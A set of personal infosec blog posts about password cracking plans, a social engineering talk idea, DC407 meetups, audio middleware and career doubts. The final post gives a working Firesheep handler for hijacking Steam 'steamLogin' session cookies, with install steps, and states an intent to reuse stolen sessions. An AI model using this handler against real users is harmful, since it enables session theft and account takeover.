the disillusioned

So it’s been a while since I’ve had a serious update to the blog.

Some of the things I’m working on I can’t quite talk about (work related), but I can go over some of the stuff I’m trying to accomplish.

Passwords: A conversation I had with @biosshadow on Twitter lead me to have a series of conversations with him regarding something I’d like to work on, but currently can’t afford to. I have a lot of research to do with enacting it, but I’d like to start a commercial password cracking tool. The cost is currently very high. Bitcoin miners are taking over a lot of the really good hardware since it’s similar work involved. I’m hoping with the recent crashes of the BTC market, I’ll eventually be able to nab a few mining rigs or good Radeon cards. He’s started a similar project that I’ve outlined in the post below this one and we’re going to be working together on it. (working on details soonish)

I submitted a talk to Shmoocon about social engineering, it got rejected, but it makes me realize that I CAN and should submit talks to conferences. I had what I thought was a good topic (and a few people agreed with me): What the SE community can learn from pickup artists. If you are not familiar at all with pickup artistry, but you are familiar with social engineering, I encourage you to check it out. I’m going to outline it in a post sometime this week as I get more time, but the tl;dr is that pickup artists use their brand of social engineering to get laid. It’s more complicated than that and I will readily admit that I dove into that world for a while, but not for the reasons it’s regularly associated with. For one, it’s a confidence builder. Most people that know me or have known me are aware of the fact that I have had very little self confidence socially. Following exercises from this community, I’ve built up my self-confidence and have mostly eliminated my previous social anxiety. This all happened in less than a year. The goal of this talk is to highlight their community and support efforts, showcasing how quickly one can learn SE techniques from actively using pickup artist techniques. If you are familiar with the Star Wars universe at all, I was going to title it “The Dark Side of Social Engineering” based on the lore of the universe (quick path to power, etc), but expecting readers to pick that portion up from the title instead of seeing “The Evil Side of Social Engineering” is too much. I’m pretty nerdy.

The point of all that is that I’m planning on submitting this and possibly other talks in the future. It’s easier than it seems and it also seems like I have cool things to talk about, where previously I didn’t think I did.

If you have feedback on my talk idea, I’d love to hear it, drop a line in the comments or g3k AT disillusion dot us

Just wanted to show off a project a friend of mine is working on called the PANIC Project. Bioss and I started talking on Twitter regarding this project about 6 months ago, my interest being in building a service that cracks passwords and his being collecting data related to passwords, we decided to get together and talk about it. (Now, we haven’t had a chance to do that yet, but with him formally announcing his project, we’re going to be talking about it frequently ) PANIC will scan “dump” or leak sites and look for real time password dumps to correlate data and find patterns.

Check it out at: https://biosshadow.com/2011/12/18/panic-project/ or https://groups.google.com/group/panic-project if you want to help out.

So I’ve been taking a hard inward look of myself lately and it has led me to the conclusion that I am lacking in key areas. I asked a good friend of mine what he thought about this and he told me that I was a pussy, that my parents gave me a sense of entitlement and I’ve never really had to work hard for what I wanted. While this may seem harsh, it was exactly what I needed to hear and it’s true for the most part. If you look at my past and my present, I seem to have skated by somehow. I stumble into opportunities and I feel like I never really fully earn them.

So with this comes the initial self-doubt. “What am I doing in infosec?” “How did I manage to get here?” Then the realization that it’s time to man the fuck up.

So what comes from this?

Well, I see it as a time for growth. With everything that I’ve inadvertently done this past month to myself and possibly my career, it’s torn me and my ego down. Now it’s time to rebuild everything I thought I was into who I want to be.

I have a few projects I’ve been delaying because of whatever the hell reason. Now is the time to focus on them and get moving forward. I want to start from the beginning of my technical knowledge and fill the gaps. I feel like I have a great understanding in many things, but there are holes and gaps in my understanding that starting from the basics will help. I’ll probably post an outline of how I want to accomplish that once I’ve organized my thoughts.

There always comes a time where you need to step back, take a knee and do some science. The past month has been about nothing than reaching back to the core of everything that builds me and hitting that place where for a moment I was my own personal god. I feel like getting the job I wanted for so long has gotten me into a bad place mentally, very complacent and not experimenting. So I took a knee.

Nerdapalooza breathed some light back into me. I hung out with Int 0×80 from Dual Core Music, listened to some new nerdcore artists I haven’t really had a chance to listen to and just kicked back. I met my personal hero, king of nerdcore and spam ytcracker. One of the coolest dudes I have ever had the chance of talking to. I’m flying out to hacker mecca tomorrow to hang with the community I once worshiped and am now a part of.

DC407 continues to grow. While our membership is still stagnant, I feel the quality of the membership is there and our presentations every month are getting really good. A lot of good things are growing from this group and I’m still excited to be a part of it. Speaking of which, here is the vulnerable PHP that was used in last week’s presentation: http://disillusion.us/dc407.tgz I’m looking forward to this year’s Defcon for the DCG meetup to get some other’s ideas on running Defcon Groups.

Anyways, wrapping up for now. I have a lot of stuff to do before I fly out tomorrow, especially getting product ready for my new tshirt company that I accidentally started with some friends.

edit: take a knee for mankind

DC407 for June went amazingly. I taught a quick primer on lockpicking and demonstrated how neat SET can be with a cred harvesting attack and tab nabbing attack. Since Abyss moved http://dc407.com over to WordPress hosting instead of on his server,  I no longer have access to update there for now.

Wanted to share some lockpicking links like I mentioned at the meeting on Friday:

http://locksport.com/index.php/discover-lockpicking/
http://www.schuylertowne.com/resources/
http://www.openlocksport.com/training.html
http://www.lockpicking101.com/

You can find SET (Social Engineering Toolkit) here: http://www.secmaniac.com/download/

The meeting went great, everyone got a chance to play with locks and learn how they work.  I’m glad everyone came out that did, if you want to talk about something next month or have feedback for previous meetings, please hit me up: g3k@disillusion.us

Damn.

I gotta say that I’ve been full of so much fail lately. I’ve had so much on my plate that I am having problems doing things I want to do. I’m basically being ddos’s by my own life.  Screw that noise.

What’s on the table now? Not a whole lot, sadly. I don’t have a lot of time to work on projects lately, I’ve been traveling a lot and I just moved 3 hours south of where I was.  I’m struggling with finding something to do, that I can actually do. I have a lot of ideas I want to try, but my technical skill is low in these areas, so I’ll just have to build a framework to get there.

DC407 is going to be getting more active in the coming months. Now that I’m in Orlando, it should be easier to help out and make my way there. I was trying to participate and drive 3+ hours to get there. I have some fun ideas in my head, but I’m afraid of the group turning into a circle jerk. It’s the same people giving content every month, and it’s the similar things. A few ideas:

• Metasploit workshops. Metasploit is still growing in popularity and maturing very fast, so much has changed last time we looked at it. Examine our current VM environment and add new machines as needed.
• Lockpicking workshops. I bought a lot of locks from eBay and a few Chinese lockpicks from dealxtreme
• Simple exploit development workshops. Writing exploits is relatively simple, but a lot of people think there is a lot of voodoo behind it. I want to make a simple educational framework to develop and write exploits, eventually moving beyond buffer overflows into some of the more advanced topics.

We’re struggling with membership. Like I mentioned earlier we have a few core members and it feels like a circlejerk sometimes. That’s not so terrible and I enjoy spending time with the same people, but I worry people may get bored and leave.  I would really like to see this explode some more. 2010 we went nuts with this, lets make this much better.

FMOD Middleware tool

I have been doing a lot of experimenting with middleware, such as FMOD. Middleware tools are tools that lay on top of a game engine and provide advanced functionality. The most common ones seen are for game audio, such as FMOD, WWISE, MILES AUDIO (HL2 runs a modified version of MILES), etc. While WWISE is undoubtedly the most advanced and crazy, FMOD is easy to work with and is free to download and play with (without a license you cannot integrate its functionality into a game, but you can design events and send them to someone with the license to implement). This picture demonstrates a simple example of a multi-tracked FMOD event that is mimicking a very basic function of a helicopter. In this example are 4 layers, the blades and three levels of wind speed. It is a very basic, and barely functional example but demonstrates some of the technical capabilities of FMOD. Where normally in a game engine such as UDK you have a basic, limited ability to mix audio based on distance in a perfect sphere shapable only by using reverb volumes; in a middlware tool such as FMOD you can control sound based on any self-set parameter you can think of. As long as your programmer can hook that parameter, your set! Now I know discussion of middleware might not be interesting to all of you, but I am sure there are a few of you who’s interests are piqued. Besides, g3k already has all the infosec covered, I am just here to add more science!

If you want me to cover anything audio-related in particular, I will gladly do so if it is within my current or foreseeable knowledge. I am probably going to cover the UDK (unreal development kit), and when I have time, a more in-depth look at the advanced functionalities of FMOD (and or WWISE if I feel like it).

Today You, Tomorrow Me

|-_-| Faceman

This post is going to deviate a little from the norm. I’m trying to focus more on learning new things, but I’m finding it difficult to learn one thing when there are a million other things out there to learn. I feel like I’m being pulled in 9001 different directions. It’s hard when you start out in this field to know what to do. You can say you want to be a pentester, but there is so much more than just being a pentester. You can specialize in other skills as well, reversing malware, finding bugs and writing exploits, forensics, network analysis, the list goes on. I’m generally a jack of trades, at least in IT I was, but I’m finding it hard to concentrate on learning one thing at a time. I’m overwhelmed with the vastness of things to learn.  I’m currently taking the Pentesting with Backtrack course from work,  I’m also running a honeypot project, reading about reversing malware and  I’m practicing my social engineering in the evenings when I go out. On top of all that, I’m learning PCI stuff for my day job.

What do you do to focus all this? I guess a thing I could do is write a list and prioritize what I want to learn and make goals. That’s what people do, right?  The hard part is making that decision, what do I want to learn? How do I want my career to progress? I feel like after I’ve gotten my first job in InfoSec (and in compliance) I’ve stagnated somehow, I feel like a new car that’s been driven off the lot; my value has gone down.

So my millions of readers, how would you combat this? Have you gone through something like this in the past? How did you fix it? Leave a comment, or fire me an email: g3k@disillusion.us

So it may be obvious there has been a few changes around here, but g3k also decided he needed someone to break up the monotony of his posts. Not saying he is monotonous, but he acknowledged that he wanted a farther reaching range of content. So he asked me to write for him, to not only maintain a constant influx of new posts for you to read, but to also break away from the usual content and delve deeper into the entity that is the internet and all of its appendages. Now, g3k is so far beyond me in InfoSec knowledge it isn’t even funny, but at the same time that is as far from my chosen career path as you can get and still use a computer regularly. However, I have the blessing of being in contact regularly with some rather interesting people, and this allows me to bring further insight to many topics. Now, my skills lie mostly in the audio field: studio recording, live sound, sound design etc. But my heart was originally in the computer, on the internet, floating amidst the cursing mountain dew guzzling jackasses that now comprise the professionals entering the InfoSec industry.

Until next time, when I can hopefully bring enlightening words to your rss feed,

|-_-| faceman

I put together a quick Firesheep handler for a session cookie flaw that was disclosed here. It’s nothing crazy, or groundbreaking, but I figured I’d post it here and get credit where credit is due. It would blow if someone else found this from me posting it places and took credit.
I have a link to this on a pastie.org private paste, you can also view that instead if you like.

register({
name: 'steam.com',
url: 'http://www.steampowered.com',
domains: [ 'steampowered.com' ],
sessionCookieNames: [ 'steamLogin'],
});

Open up Notepad or whatever text editor you use, copypasta this and save as steam.js to the directory below in Windows

%appdata%\Mozilla\Firefox\Profiles\sgmeared.default\extensions\firesheep@codebutler.com\

I’m too lazy to look up the extension paths in other OSes, so you’re just going to have to do a little work.

I’m going to be looking into how the Steam client handles cookie data this week, I’m pretty sure I can steal a session cookie and use it in the client itself to download whatever. I’ll have to see how it works first